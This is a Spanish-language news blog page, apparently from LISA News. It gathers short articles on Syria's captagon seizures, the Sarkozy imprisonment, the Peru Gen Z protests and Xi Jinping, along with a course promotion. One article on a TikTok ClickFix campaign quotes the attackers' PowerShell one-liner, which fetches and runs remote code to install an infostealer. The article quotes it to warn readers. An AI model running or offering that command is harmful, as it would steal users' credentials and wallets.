Inicio Blog Página 15

Siria incauta más de una decena de pastillas de captagon en Damasco

Nueva operación antidrogas en Siria desmantela una red de contrabando de captagon tras meses de vigilancia e intensifica las redadas contra el tráfico de esta droga, fuente clave del antiguo régimen.

Las autoridades Sirias (en el país tras la caída del régimen de Bashar al Assad en diciembre de 2024) informaron este martes 21 de octubre de la incautación de unas doce millones de pastillas de captagon en los alrededores de la capital Damasco. La operación, descrita como una de las mayores de los últimos meses, se enmarca en los esfuerzos del nuevo gobierno por desarticular las redes de narcotráfico que operan en el país. El Ministerio del Interior sirio confirmó que la acción se llevó a cabo tras recibir datos de Inteligencia que apuntaban a movimientos sospechosos en la zona de Al Dumair.

➡️ Te puede interesar: Máster Profesional de Analista de Inteligencia

El director del Departamento Antidrogas, Jaled Eid, explicó además que las fuerzas de seguridad actuaron contra «una red de contrabando de drogas que buscaba sacar del país una gran cantidad de narcóticos». Según precisó, la operación comenzó tras una fase prolongada de seguimiento y vigilancia. Eid también afirmó que las autoridades lograron detener al líder del grupo criminal, aunque los demás implicados continúan prófugos y bajo búsqueda activa.

Vigilancia activa contra el captagon

«Tras una vigilancia cuidadosa y continuada, se llevó a cabo una operación cualitativa exitosa que se saldó con la incautación de aproximadamente doce millones de pastillas de captagon y la detención del líder de la red», declaró. El funcionario añadió que las drogas confiscadas serán «destruidas», mientras que el detenido ya se entregó a las autoridades judiciales «para que se tomen las medidas legales necesarias contra él», según el comunicado oficial difundido en la cuenta de Telegram del Ministerio del Interior.

➡️ Te puede interesar: Curso de Experto en Análisis e Investigación del Narcoterrorismo

La semana anterior, el Ejecutivo de transición comunicó la detención de tres personas y la incautación de más de 265.000 pastillas de captagon en Alepo, al norte del país. Desde su instauración, ha ejecutado múltiples operaciones para desmantelar redes vinculadas con el narcotráfico, sobre todo de esta sustancia estimulante. El captagon fue una de las principales fuentes de financiación del régimen de Al Assad durante los años de guerra civil iniciada en 2011, según admiten los nuevos responsables de seguridad.

Masterclass | Cibercrimen, ciberseguridad e ingeniería social: el eslabón humano en el fraude digital

Cibercrimen, ciberseguridad e ingeniería social: el eslabón humano en el fraude digital

Masterclass organizada por LISA Institute

🗓️ El martes 17 de febrero de 2026 – 18:00h (CET)

👉Inscríbete aquí y recibirás el enlace a Zoom al instante

💸 100% online y gratis. Plazas limitadas a las primeras 500 personas que se conecten a la Masterclass.

Quién participa

👤 Juan Carlos Galindo, Experto en Prevención, Detección y Análisis de Estafas y Fraudes Digitales.

A nivel profesional, es Socio-Director de Galindo Benlloch, una Firma legal que presta servicios de cumplimiento normativo, consultoría legal, servicios jurídicos e investigación técnica judicial. En el plano asociativo, es Vocal de la Junta Directiva Internacional de la World Compliance Association y Coordinador de su Comité Internacional de Prevención del Blanqueo de Capitales y Financiación del Terrorismo. Es Presidente de Honor de la Asociación Española de Sujetos Obligados en Prevención del Blanqueo.

A nivel académico, es Graduado en Políticas de Seguridad y Control de la Criminalidad (UCAV), Detective Privado, Director de Seguridad, Experto Externo en Prevención del Blanqueo de Capitales y Financiación del Terrorismo, Experto en Protección de Datos, Perito Judicial Experto en Investigación de Delincuencia Económica, Perito Judicial en Ciberdelincuencia y Conducta Criminal en la web, Perito tecnológico Forense, entre otras.

A nivel docente, es Profesor del Máster Profesional de Analista Criminal y Criminología aplicada y del Máster Profesional en Ciberseguridad, Ciberinteligencia y Ciberdefensa
de LISA Institute.

👤 Daniel Villegas (@DanielVillegas). Director general de LISA Institute.

En el ámbito profesional, es fundador y director general de LISA Institute. Es asesor en materia de seguridad, inteligencia y ciberseguridad para diversas empresas e instituciones públicas, tanto en Europa como en América. A su vez, es consultor en proyectos para la OTAN, ONU y Unión Europea. Anteriormente, fue responsable de seguridad y análisis en la Unidad de Seguridad y Protección Civil de Metro de Barcelona.

Académicamente, es licenciado en Criminología (UIC), graduado en Prevención y Seguridad Integral y posgrado superior en Gestión y Derecho de la Seguridad (EPSI), máster en Mundo Árabe e Islámico (UB), máster oficial en Terrorismo (UNIR), máster en Análisis de Inteligencia (UAB), máster en Cybersecurity Management (UPC), CISA y CSX (ISACA).

Qué aprenderás en esta masterclass

El 95% de las brechas de seguridad tienen su origen en el factor humano, según datos de IBM. En un contexto en el que la ciberseguridad es clave para la protección de datos personales y activos digitales, comprender los mecanismos del cibercrimen y la ingeniería social se vuelve esencial.

La masterclass «Cibercrimen, ciberseguridad e ingeniería social: el eslabón humano en el fraude digital» te permitirá conocer los tipos de fraude digital más frecuentes, los perfiles criminales implicados y las estrategias para la detección temprana de amenazas. Todo ello de la mano de Juan Carlos Galindo, experto de referencia internacional y docente en programas de alto nivel de LISA Institute.

Objetivos de aprendizaje

  • Identificar las principales amenazas de fraude digital actuales.
  • Comprender las técnicas de ingeniería social utilizadas en ataques cibernéticos.
  • Analizar el papel del eslabón humano en la ciberseguridad organizacional.
  • Reconocer las tipologías criminales implicadas en estafas y fraudes.
  • Evaluar mecanismos de detección temprana y prevención de ciberfraudes.
  • Conocer casos prácticos reales desde el ámbito forense y judicial.
  • Desarrollar buenas prácticas para la protección de datos personales.
  • Fortalecer la cultura de ciberseguridad en entornos profesionales.

Audiencia objetivo

Esta masterclass ha sido confeccionada para aquellos que trabajan o aspiran a trabajar como:

  • Analistas de ciberinteligencia
  • Especialistas en ciberseguridad
  • Expertos en cumplimiento normativo y compliance
  • Directores de Seguridad
  • Peritos judiciales en delitos informáticos
  • Investigadores de fraudes digitales
  • Consultores en prevención del blanqueo de capitales
  • Profesionales de protección de datos
  • Fuerzas y cuerpos de seguridad del Estado
  • Estudiantes de criminología, derecho o ciberseguridad

Además…

La masterclass «Cibercrimen, ciberseguridad e ingeniería social: el eslabón humano en el fraude digital» forma parte de la serie de los más de 35 webinars en directo que LISA Institute y LISA News han organizado este año en el contexto del Máster Profesional en Ciberseguridad, Ciberinteligencia y Ciberdefensa de LISA Institute.

Si no quieres perderte otros eventos y actividades relacionados con la InteligenciaInternacionalDD HH y Ciberseguridad que van a ocurrir próximamente, pincha aquí.

Nueva estafa usa TikTok para enviar malware con falsos tutoriales

Una campaña en TikTok difunde supuestas guías para obtener software gratis que realmente instalan malware y roban contraseñas mediante ataques ClickFix.

Una reciente campaña de ciberdelincuentes utiliza TikTok como plataforma para difundir vídeos que fingen ofrecer métodos gratuitos para acceder a software y servicios de pago, como Windows, Photoshop o Netflix. Estos tutoriales, en apariencia inofensivos, esconden ataques conocidos como ClickFix, diseñados para distribuir malware y robar información personal, incluidas contraseñas. Según advirtió el SANS Internet Storm Center (ISC), los atacantes están aprovechando la enorme visibilidad de TikTok para diseminar campañas de ingeniería social disfrazadas de ayudas técnicas.

➡️ Te puede interesar: Máster Profesional en Ciberseguridad, Ciberinteligencia y Ciberdefensa

Los ciberdelincuentes han convertido la red de vídeos cortos de ByteDance en un espacio ideal para enganchar a las víctimas. A través de guías que prometen activar software o servicios premium de forma gratuita, logran atraer a usuarios de todas las edades. Los vídeos instruyen paso a paso sobre cómo ejecutar supuestos procesos técnicos para desbloquear funciones restringidas o versiones completas. Sin embargo, en realidad manipulan a los usuarios para que ejecuten código malicioso.

Tácticas de ingeniería social

Según los hallazgos del ISC, los ataques ClickFix emplean ventanas emergentes o instrucciones visuales que imitan herramientas de soporte técnico. Su objetivo es convencer a las víctimas de seguir indicaciones que culminan en la ejecución de un script malicioso en PowerShell, donde el usuario cree que está solucionando un problema o accediendo a una función gratuita, cuando en realidad está cediendo el control de su dispositivo.

➡️ Te puede interesar: Curso de Concienciación en Ciberseguridad

Bleeping Computer verificó que los vídeos incluyen comandos cortos, como [iex (irm slmgr.win/photoshop)], que los usuarios deben copiar y ejecutar como administradores. Este código conecta con servidores remotos desde los que se descargan otros scripts de PowerShell. Detrás de ese proceso, se ocultan dos ejecutables que se instalan sin el consentimiento del usuario, uno de ellos identificado como una variante del ladrón de información Aura Stealer.

Control del dispositivo

El malware Aura Stealer se centra en extraer credenciales de inicio de sesión, cookies de autenticación y carteras de criptomonedas almacenadas en el dispositivo. De forma paralela, un segundo ejecutable es capaz de compilar código bajo demanda, aunque se desconoce su función concreta. Los investigadores sospechan que podría servir para ampliar las capacidades del ataque o mantener el acceso persistente al sistema comprometido.

➡️ Te puede interesar: Curso de Prevención y Gestión de Ciberriesgos y Ciberataques

Como consecuencia de esta operación, los expertos alertan de que cualquier usuario que haya seguido las instrucciones de estos vídeos en TikTok ha visto comprometidas sus contraseñas. Además, los expertos alertan en que no existen métodos legítimos para obtener software de pago sin licencia. Del mismo modo, Bleeping Computer ha recordado que la ejecución de comandos desconocidos desde fuentes no verificadas puede derivar en la pérdida total de datos y violaciones graves de seguridad.

Ingeniería social: qué es, cómo funciona y cómo protegerte

Este artículo explica qué es la ingeniería social, muestra casos reales en los que se aplica y cómo evitarla

Hay veces en las que un clic, una respuesta automática o contestar a una llamada es suficiente para acabar con un sistema entero. Este es el caso de la ingeniería social, un peligro que no actúa con malware sofisticado, sino engañando.

¿Qué es la ingeniería social?

La ingeniería social es una forma de manipulación psicológica orientada a conseguir que una persona haga algo que no debería hacer: compartir una clave, abrir un archivo malicioso, dar acceso a un sistema o simplemente revelar información que parece inofensiva. A diferencia de otros ciberataques que dependen de agujeros técnicos, aquí el punto débil somos nosotros.

➡️ Te puede interesar: ¿Qué es el cibercrimen y cómo protegerse?

No siempre se presenta igual, pero sí sigue un patrón reconocible. Primero, el atacante recopila información. Puede buscar datos en redes sociales, páginas web corporativas o en cualquier fuente pública. Después, entra en contacto con la víctima. A veces por correo, otras por teléfono o incluso en persona. Y si consigue ganarse su confianza o generarle suficiente urgencia, da el siguiente paso: pedir algo.

Ahí es donde ocurre el fallo. Porque ese «algo» puede parecer un simple trámite, pero abre la puerta a un robo, un chantaje o un ataque mayor.

Casos reales de ingeniería social

Hay numerosos ejemplos. Desde campañas masivas de phishing que simulan correos de bancos o empresas conocidas, hasta estafas dirigidas que suplantan a directivos para ordenar transferencias millonarias. Incluso se han dado casos de atacantes que dejan USB infectados en zonas públicas esperando que alguien los conecte por curiosidad.

➡️ Te puede interesar: Protección de datos personales: cómo mantener tu información segura en línea

También están los fraudes por SMS (smishing) y las llamadas automáticas que fingen ser de organismos oficiales (vishing). En todos los casos, el objetivo es el mismo: explotar la confianza, la prisa o el miedo de la víctima para que actúe sin pensar.

Uno de los más conocidos es el fraude al CEO, donde un empleado recibe un correo que parece venir del director general pidiendo una acción urgente, como realizar un pago o compartir información delicada. Si esto llega a darse, los daños pueden ser inmensos.

Claves para no caer en ataques de ingeniería social

Si algo suena raro, lo más probable es que lo sea. Lo básico funciona: verificar el remitente de los correos, no abrir enlaces dudosos, desconfiar de urgencias forzadas y no compartir datos personales si no hay total certeza de quién los pide.

➡️ Te puede interesar: Análisis del perfil criminológico de los ciberdelincuentes

Actualizar el software ayuda, pero aquí lo clave es pensar. La formación en ciberseguridad dentro de las empresas, por ejemplo, ha demostrado ser más eficaz que muchos antivirus. Y en casa, conviene aplicar lo mismo: pensar antes de actuar.

La realidad es que la ingeniería social seguirá presente mientras haya alguien dispuesto a confiar. La buena noticia es que no hace falta ser experto en informática para evitarlo, basta con hacer una pausa, mirar dos veces y no creerse todo lo que llega a la bandeja de entrada.

➡️ Si quieres adquirir conocimientos sobre Ciberseguridad, te recomendamos los siguientes cursos formativos:

El Partido Republicano cierra una sección juvenil en Nueva York por mensajes de odio

Los líderes republicanos de Nueva York votan por unanimidad la disolución de los Jóvenes Republicanos tras la filtración de un chat con mensajes antisemitas y homófobos.

La dirección del Partido Republicano en el estado de Nueva York votó por unanimidad la eliminación de los Jóvenes Republicanos tras la filtración de un chat con mensajes antisemitas y homófobos. El canal interno, publicado por el portal Politico, expuso comentarios sobre cámaras de gas, Adolf Hitler y agresiones sexuales. El escándalo llevó a la organización estatal a actuar de forma inmediata, dada la gravedad de los contenidos y la implicación directa de su dirigencia juvenil.

Peter Giunta, presidente del grupo disuelto, escribió uno de los mensajes más polémicos: «Quien vote que no, a la cámara de gas». Su segundo al mando, Bobby Walker, calificó en otro texto las violaciones como algo «épico». Estas revelaciones confirmaron una cultura interna que se había cuestionado en otras ocasiones por su tono extremista. Sin embargo, los mensajes fueron determinantes para la votación unánime que puso fin a la estructura juvenil dentro del partido en el estado.

➡️ Te puede interesar: Máster Profesional de Analista Criminal y Criminología Aplicada

Según el presidente del Partido Republicano en Nueva York, Ed Cox, Giunta presentó su dimisión antes de la decisión. En declaraciones a Politico, Cox afirmó que «los Jóvenes Republicanos ya estaban horriblemente gestionados, y este lenguaje tan vil no tiene cabida en nuestro partido». Asimismo, añadió que el hecho no solo vulneraba los valores del partido, sino que dañaba su imagen pública en un momento político especialmente sensible.

Cox aprovechó también para diferenciar la actuación republicana de la de los demócratas. «A diferencia del Partido Demócrata, que adopta una retórica antisemita y se niega a condenar a los líderes que instan a la violencia política, los republicanos exigen responsabilidades destituyendo inmediatamente de sus cargos a quienes utilizan ese tipo de retórica», sostuvo. Desde el ala progresista demócrata respondieron que sus críticas se centran únicamente en la ofensiva israelí en Gaza, a la que han calificado de genocidio, y no contra la comunidad judía.

Si quieres adquirir conocimientos sobre Criminología, te recomendamos los siguientes cursos formativos:

El expresidente francés Nicolas Sarkozy ingresa en prisión

Nicolas Sarkozy comenzó a cumplir cinco años de cárcel en La Santé tras ser condenado por financiación ilegal de su campaña de 2007 con dinero libio.

Nicolas Sarkozy ingresó este martes 21 de octubre en la prisión parisina de La Santé para cumplir una condena de cinco años por conspiración criminal y financiación ilegal de su campaña de 2007 con dinero libio. Es el primer expresidente francés que entra en prisión, tras una sentencia dictada en septiembre que ordenó su encarcelamiento inmediato. El juez argumentó que la gravedad de los hechos exigía ejecutar la pena sin esperar la apelación. Según la resolución, Sarkozy solo podrá solicitar su excarcelación una vez encarcelado.

➡️ Te puede interesar: Máster Profesional de Analista Internacional y Geopolítico

Antes de su traslado a prisión, unas cien personas se reunieron frente a su domicilio en el distrito 16 de París. Allí se encontraba Henri Guaino, antiguo asesor y amigo personal, así como su familia. Sarkozy salió brevemente para saludar a la multitud que coreaba «¡Nicolas, Nicolas!», y «¡Sarkozy, presidente!». Luego fue escoltado por una comitiva policial hasta La Santé, en medio de una amplia cobertura mediática. El ministro de Justicia, Gérald Darmanin, confirmó su ingreso y aseguró que «se garantizarán las condiciones de seguridad requeridas».

Sarkozy reitera su inocencia

El exmandatario, que dirigió Francia entre 2007 y 2012, asegura que es inocente y calificó su encarcelamiento como un acto injusto. «No tengo miedo a la cárcel. Mantendré la cabeza alta, incluso ante las puertas de La Santé. Lucharé hasta el final», declaró al diario La Tribune Dimanche. En otra entrevista, con Le Figaro, adelantó que pedirá recluirse en régimen de aislamiento o, en su defecto, en la sección de «reclusos vulnerables», conocida informalmente como zona VIP.

➡️ Te puede interesar: Curso de Analista Político Internacional

En esa zona, el expresidente podría disponer de una celda individual de 9 m², con condiciones separadas del régimen general. La prisión, inaugurada en 1867 y completamente renovada, ha alojado a figuras tan dispares como el capitán Alfred Dreyfus y Carlos el Chacal. Pierre Botton, exempresario encarcelado en esa misma sección, comentó que «no es Nicolas Sarkozy, presidente de la República, el que entra, sino un hombre que vivirá como todos los demás». Añadió que en La Santé «aunque seas presidente o millonario, no decides nada».

Primer presidente francés en prisión

La Fiscalía Nacional Financiera notificó los detalles de la detención el lunes, sin divulgar el contenido del informe. La decisión judicial, inédita en la historia reciente de Francia, convierte a Sarkozy en el primer dirigente de la posguerra que pisa una celda. Los jueces del Tribunal de Apelación dispondrán de dos meses para tramitar su solicitud de liberación provisional. La medida obedece, según el fallo, a «la perturbación del orden público causada por el delito cometido».

➡️ Te puede interesar: Curso de Analista Económico Internacional

Antes de su entrada, Sarkozy preparó su equipaje personal, autorizado por el reglamento penitenciario. Incluye ropa, tres libros y diez fotografías familiares. Entre los volúmenes escogidos figuran una biografía de Jesucristo y la novela El conde de Montecristo, historia del preso Edmond Dantès, que logra escapar de su confinamiento insular. Su hijo Louis convocó una concentración de apoyo en el barrio de su residencia, mientras Carla Bruni publicó mensajes y canciones dedicadas a su esposo en redes sociales.

Polonia detiene a ocho sospechosos por planear actos de sabotaje

Los servicios de Inteligencia y la Policía desmantelaron una red sospechosa de preparar sabotajes en infraestructura militar y crítica en Polonia.

Las fuerzas de seguridad de Polonia han arrestado a ocho personas acusadas de planear actos de sabotaje en diversas zonas del país. El primer ministro Donald Tusk informó este martes 21 de octubre que las operaciones continúan activas y no se descartan nuevas detenciones. «La Agencia de Seguridad Interna (ABW), en colaboración con otros servicios, ha detenido durante los últimos días en varias partes del país a ocho personas sospechosas de preparar actos de sabotaje», explicó en su cuenta en X. Además, añadió que «el caso está en curso y se están llevando a cabo nuevas actividades operativas».

➡️ Te puede interesar: Máster Profesional de Analista de Inteligencia

El ministro de Servicios Especiales, Tomasz Siemoniak, precisó que los sospechosos estarían implicados en tareas de «reconocimiento de instalaciones militares y elementos críticos de infraestructura». Según indicó, habrían preparado recursos para posibles acciones de sabotaje y podrían estar vinculados con intentos de ejecutar ataques directos. Las autoridades, sin embargo, no han ofrecido información adicional sobre los detenidos ni sobre las áreas específicas donde las fuerzas de seguridad realizaron las operaciones.

En paralelo, Siemoniak señaló que «la ABW coopera estrechamente con el Servicio de Contrainteligencia Militar (SKW), la Policía y la Fiscalía». Esta coordinación busca mantener el control de un caso que sigue abierto y cuyo desarrollo es considerado sensible para la seguridad nacional. Hasta el momento, el Gobierno polaco mantiene la reserva sobre cualquier vínculo internacional o motivación detrás de los hechos investigados.

Si quieres adquirir más conocimientos sobre Inteligencia, te recomendamos los siguientes cursos formativos:

¿Qué está pasando en Perú? Anatomía de la insurrección digital Gen Z

0

Perú atraviesa una nueva ola de protestas lideradas por la Generación Z. La destitución de Dina Boluarte reactivó el descontento juvenil. Redes sociales, símbolos globales y acción directa marcan esta movilización. En este análisis, Artiom Vnebraci Popa explora cómo, más que una protesta, se trata de una reconfiguración del contrato social desde lo digital.

El pasado mes de septiembre marcó un punto de inflexión en la configuración del espacio político peruano. Las calles de Lima se transformaron en escenarios de reivindicación generacional. Las manifestaciones protagonizadas por jóvenes nacidos entre el 1995 y el 2012 emergieron el 20 de septiembre como respuesta multimodal a una crisis sistémica que se inscribe en una amplia narrativa de fractura institucional.

Desde una perspectiva de analítica, resulta imperativo examinar estos acontecimientos no como episodios aislados de efervescencia juvenil. Son manifestaciones sintomáticas de un deterioro profundo en el contrato social peruano. La movilización de la Generación Z, tanto a nivel nacional como global, representa un fenómeno que trasciende las categorías tradicionales de protesta política. Incorpora elementos de la cultura digital, del simbolismo transnacional y de la articulación horizontal, lo que desafía los paradigmas convencionales de organización ciudadana.

Los vectores de la crisis en Perú

Los manifestantes articularon sus demandas en 4 ejes principales

  1. justicia por las muertes ocurridas durante las protestas de 2023, 
  2. reforma del sistema de pensiones, 
  3. combate frontal contra la delincuencia organizada,
  4. y la vacancia de la presidenta Dina Boluarte. 

Esta arquitectura reivindicativa revela la complejidad del fenómeno. En ella convergen memorias traumáticas recientes, preocupaciones materiales sobre el futuro y un rechazo emergente a la clase política actual.

Un ejemplo clave fue la unión del gremio de transportistas a las movilizaciones tras el asesinato de más de 180 conductores en el 2025 por parte del crimen organizado. Los choferes de autobús, los repartidores y los taxistas son objetivo de sicarios y extorsionadores, por lo que su desesperación frente a tal problemática se inscribe en la incapacidad de respuesta del Estado (y a veces en su complicidad percibida). Así, tal fenómeno no constituye una anomalía estadística sino una tendencia sostenida que erosiona la confianza en las instituciones de seguridad.

➡️ Te puede interesar: ¿Qué está pasando en Madagascar y Georgia? La generación Z sigue desafiando poderes autoritarios

A su vez, la reforma previsional del sistema de AFP (Administradoras de Fondos de Pensiones) fue otro de los detonantes de las protestas. Se sumó a la precariedad laboral que aguarda a la juventud peruana. Todo esto ocurre en un contexto donde los modelos de acumulación capitalista han fracasado en garantizar estabilidad a las generaciones emergentes.

La dimensión simbólica: signos de una generación conectada

Un elemento revelador del movimiento reside en su gramática visual. La presencia de banderas del manga One Piece (específicamente la calavera con sombrero de paja que representa a los protagonistas de la historia), se replicó en protestas de Nepal, Indonesia, Paraguay y Marruecos. Este fenómeno evidencia la formación de una consciencia política transnacional que opera mediante códigos compartidos en el ecosistema digital.

De esta forma, la bandera de los «Piratas del Sombrero de Paja» no es meramente ornamental. En el universo de One Piece, los protagonistas desafían sistemas opresivos, buscan libertad y construyen solidaridades horizontales frente a estructuras autoritarias.

La apropiación de este símbolo por movimientos juveniles globales sugiere la emergencia de un lenguaje político alternativo. En él, las referencias culturales sustituyen o complementan los íconos tradicionales de la izquierda o del nacionalismo liberal.

Los manifestantes rechazaron que se les tildara de vándalos o terroristas, explicando que el símbolo representa unidad generacional y lucha contra la corrupción.

Esta hibridación semiótica plantea desafíos interpretativos. La Generación Z no se limita a replicar repertorios de protesta heredados, sino que construye una gramática propia. En ella, lo lúdico, lo digital y lo político se entrelazan de forma creativa. Su capacidad de articulación mediante redes sociales, transmisiones en directo y convocatorias virales por TikTok demuestra un dominio instrumental de las TIC. Es una habilidad que las estructuras partidarias tradicionales no poseen.

La respuesta estatal de Perú: entre la contención y la represión

El despliegue policial involucró a 5.000 efectivos que emplearon gases lacrimógenos y perdigones de goma para dispersar a los manifestantes. Las imágenes de la represión circularon masivamente en redes sociales, generando un efecto amplificador que movilizó más adhesiones a las protestas. Un caso controversial fue la agresión a un adulto mayor, golpeado en el rostro por un agente policial (cuyo video provocó indignación nacional).

La Coordinadora Nacional de Derechos Humanos reportó 18 heridos en las manifestaciones del 27 de septiembre, incluyendo un periodista y un brigadista. La violencia contra trabajadores de prensa se convirtió en un patrón recurrente, con casos de agresiones físicas directas a reporteros que portaban credenciales y equipos claramente identificables. Estas acciones no solo vulneran la libertad de prensa, sino que revelan una doctrina de control que privilegia la contención sobre la protección de derechos fundamentales.

Es relevante señalar que no todas las jornadas de protesta derivaron en enfrentamientos violentos. La manifestación del 4 de octubre se desarrolló con menor concurrencia y concluyó de manera pacífica. Esto sugiere que la escalada de violencia responde a dinámicas específicas de interacción entre manifestantes y fuerzas del orden, más que a una predisposición inherentemente violenta de alguna de las partes.

   ➡️ Te puede interesar: Relación entre la anticipación estratégica y el crimen organizado en América Latina

El nuevo ministro del Interior, Vicente Tiburcio, emitió declaraciones públicas solicitando a los manifestantes que protestaran sin violencia, afirmando que la policía está para protegerlos. Este discurso contrasta con la evidencia empírica de represión documentada, evidenciando una disonancia entre el discurso oficial y la práctica institucional.

El colapso del orden político: la vacancia de Boluarte

El 10 de octubre de 2025, el Congreso peruano destituyó a Dina Boluarte por «incapacidad moral permanente», con 122 votos a favor, sin votos en contra ni abstenciones. Esta decisión unánime es particularmente significativa. Durante su gestión se habían presentado ocho mociones de vacancia que no prosperaron debido al respaldo de las principales fuerzas políticas del Congreso hacia Boluarte.

Asimismo, el detonante que llevó a la destitución (a parte de las protestas), fue el ataque armado durante la presentación del grupo musical Agua Marina, que dejó 5 heridos y exacerbó la percepción de inseguridad generalizada. Este episodio de violencia funcionó como catalizador de una crisis que se había gestado mediante la acumulación de múltiples fracasos gubernamentales.

Fuerzas políticas como Fuerza Popular, liderada por Keiko Fujimori, y Renovación Popular, del alcalde de Lima Rafael López Aliaga, retiraron su apoyo a Boluarte. Ambas agrupaciones, que históricamente la respaldaron, tomaron distancia ante la proximidad de las elecciones de 2026.

Esta deserción estratégica de los aliados parlamentarios evidencia un cálculo político pragmático. Con niveles de aprobación del 3%, Boluarte se había convertido en un lastre electoral para las fuerzas que la sostenían.

El Congreso, enfrentando su propia crisis de legitimidad con apenas un 5% de aceptación ciudadana, ejecutó la vacancia como un mecanismo de renovación cosmética. Esta acción no altera las estructuras profundas del poder político peruano.

José Jerí, presidente del Congreso y miembro del partido Somos Perú, asumió la presidencia inmediatamente tras la destitución, en cumplimiento del orden sucesorio constitucional. Jerí, quien tiene antecedentes de denuncias por soborno y acoso sexual de las cuales fue exonerado por falta de pruebas, declaró liderar un gobierno de transición, empatía y reconciliación nacional, comprometiéndose a combatir la delincuencia mediante el despliegue de policía y fuerzas armadas.

¿Y ahora qué? La persistencia de las protestas y la respuesta del gobierno de Jerí

Las protestas en Perú han continuado con fuerza tras la destitución de Dina Boluarte, evidenciando un profundo descontento social y político. El 15 de octubre de 2025, miles de jóvenes de la Generación Z se manifestaron en Lima y otras ciudades. Exigieron la renuncia del presidente interino José Jerí y la derogación de leyes que consideran favorecedoras de la delincuencia.

Los manifestantes ven a Jerí como la continuación de las mismas problemáticas estructurales y demandan un gran cambio ecosistémico dentro de las políticas públicas peruanas. Así, la marcha (inicialmente pacífica), culminó en enfrentamientos con la policía, dejando un saldo de al menos un muerto y más de 100 heridos, entre ellos manifestantes y agentes del orden.

➡️ Te puede interesar: Transformación de los homicidios en Chile y el rol de las redes sociales

La respuesta del gobierno ha sido contundente. José Jerí difundió en sus redes sociales un video en el que se muestra el momento exacto en que un grupo de manifestantes lanzó una bomba molotov contra la Policía Nacional del Perú, calificando el acto como un intento de generar caos y violencia en el país. Además, su primer ministro (Ernesto Álvarez), calificó a la Generación Z como una banda que quiere tomar por asalto la democracia, lo que ha generado aún más tensión entre las autoridades y los manifestantes. 

Estas acciones reflejan una escalada en la represión estatal, mientras las protestas continúan siendo lideradas por colectivos juveniles organizados principalmente a través de plataformas digitales. La falta de una estructura jerárquica formal en estos movimientos dificulta su cooptación, pero también limita su capacidad de negociación política.

La situación en Perú sigue siendo incierta. El gobierno enfrenta un creciente rechazo social y una ciudadanía decidida a mantener la presión en las calles. La frecuente demonización de los manifestantes por parte de las fuerzas públicas peruanas no favorece a nadie. El mensaje que se transmite a la población es claro: sus demandas y formas de protesta son más problemáticas que la corrupción sistémica y el crimen organizado.

Conclusiones y perspectivas

Las protestas de la Generación Z en Perú representan un malestar profundo y estructural, más allá de demandas coyunturales sobre pensiones o seguridad. La caída de Boluarte y la llegada de José Jerí no han resuelto la crisis de legitimidad política, y las manifestaciones continúan, enfrentando represión estatal constante. La juventud percibe que los mecanismos formales de participación no generan cambios reales y recurre a formas de acción directa, digital y horizontal, proyectando su influencia incluso a nivel transnacional.

A corto plazo, la presión social podría radicalizarse si el gobierno mantiene medidas represivas, mientras que concesiones parciales podrían fragmentar el movimiento. A mediano plazo, solo una recomposición institucional profunda o un proceso constituyente genuino permitiría canalizar el descontento sin violencia. La experiencia reciente sugiere que, sin reformas estructurales, Perú seguirá en una trayectoria de inestabilidad crónica, donde la Generación Z emerge como actor político decisivo y portador de nuevas formas de movilización, simbolización y articulación social.

En suma, Perú enfrenta una encrucijada histórica: consolidar un diálogo institucional real o prolongar un conflicto social que redefine la política desde las calles y las plataformas digitales.

➡️ Si quieres adentrarte en las Relaciones Internacionales y adquirir habilidades profesionales, te recomendamos los siguientes programas formativos:

Xi Jinping y el ciclo del poder en China: hegemonía excepcional, no eterna

0

La China de Xi Jinping combina control absoluto y modernización acelerada. Su liderazgo ha recentralizado el poder del Partido y del Ejército, buscando estabilidad a toda costa. En este artículo, el alumno del Máster Profesional de Analista Estratégico y Prospectivo, Miguel Cuesta Hoces, analiza cómo la historia del país demuestra que ningún poder es eterno: incluso las hegemonías más sólidas acaban enfrentando su propio ciclo de desgaste.

La concentración de poder de Xi Jinping ha transformado al Partido Comunista Chino (PCCh) y al Ejército Popular de Liberación (EPL) en pilares de su autoridad. Sin embargo, la tradición política china muestra que el poder oscila en ciclos entre centralización extrema y pluralidad práctica.

¿Es Xi una anomalía histórica o parte de un ciclo más amplio? Este artículo analiza sus fundamentos ideológicos, su biografía política y el papel del EPL, y plantea la cuestión clave: qué quedará de su legado cuando abandone el poder.

La hegemonía actual de Xi Jinping en China: eficacia y fragilidad

Los regímenes autoritarios modernos se articulan alrededor de un partido-movimiento, un líder central y un cuerpo coercitivo con monopolio de la fuerza. Ese esquema facilita la movilización y estabilidad, pero entraña riesgos: desafección social, corrupción, déficit de información veraz por el miedo y personalismo que puede precipitar la caída del régimen.

➡️ Te puede interesar: Las relaciones actuales de India y China: el papel de Xi y Modi

China encaja en buena parte en este patrón. Tras Mao, predominó la descentralización y el auge de élites provinciales, especialmente en lo económico. Xi revierte esa tendencia y concentra poder en Partido, Estado y Ejército para corregir la desconexión Partido-sociedad y el desorden interno. El dilema: cuanto más concentra, más difícil resulta ejecutar sus políticas frente a la resistencia pasiva del aparato y las inercias de corrupción.

El gigante asiático es hoy un país hiperconectado: la tecnología digital y la información permiten observar con mayor claridad el funcionamiento interno del régimen, y exponen también sus fragilidades cuando se proyecta hacia fuera.

Ciclos históricos y visión del poder

Xi entiende la política china como ciclos: fases de centralización seguidas de etapas de dispersión hacia las provincias. Su proyecto no surge de la nada: bebe de la tradición imperial y revolucionaria, donde la concentración del poder se justifica en tiempos de crisis.

  • La novedad no es la centralización en sí, sino su escala en un país globalizado con capacidades materiales del siglo XXI.
  • Su control combina el carisma limitado con la disciplina ideológica: en 2018 exigió lealtad «en cualquier momento y bajo cualquier circunstancia» y reactivó rituales de crítica/autocrítica (biaotai) para bloquear la faccionalización.
  • A diferencia de Mao, no dinamita instituciones: las purga y refuerza como extensiones de su poder. Purgar sin eliminar, controlar sin desmantelar define su núcleo estratégico.

En su apuesta, Xi mezcla la censura, la educación patriótica, la vigilancia digital y el fortalecimiento burocrático. Busca estabilidad mediante ideología y logros materiales (prosperidad, modernización y proyección global). La lección de fondo: la sociedad china no tolera largos periodos de caos; la estabilidad es un imperativo político.

Contexto familiar y biográfico de Xi Jinping en China: raíces del control

Xi procede de una familia de élite comunista. Su padre, Xi Zhongxun, estuvo vinculado al aparato militar (en clave política), fue vicepremier y miembro de la Comisión Militar Central (CMC), y sufrió purgas. La vulnerabilidad de esas carreras en sistemas personalistas marcó a la familia.

➡️ Te puede interesar: La geopolítica global entre China y Estados Unidos se juega en Madrid

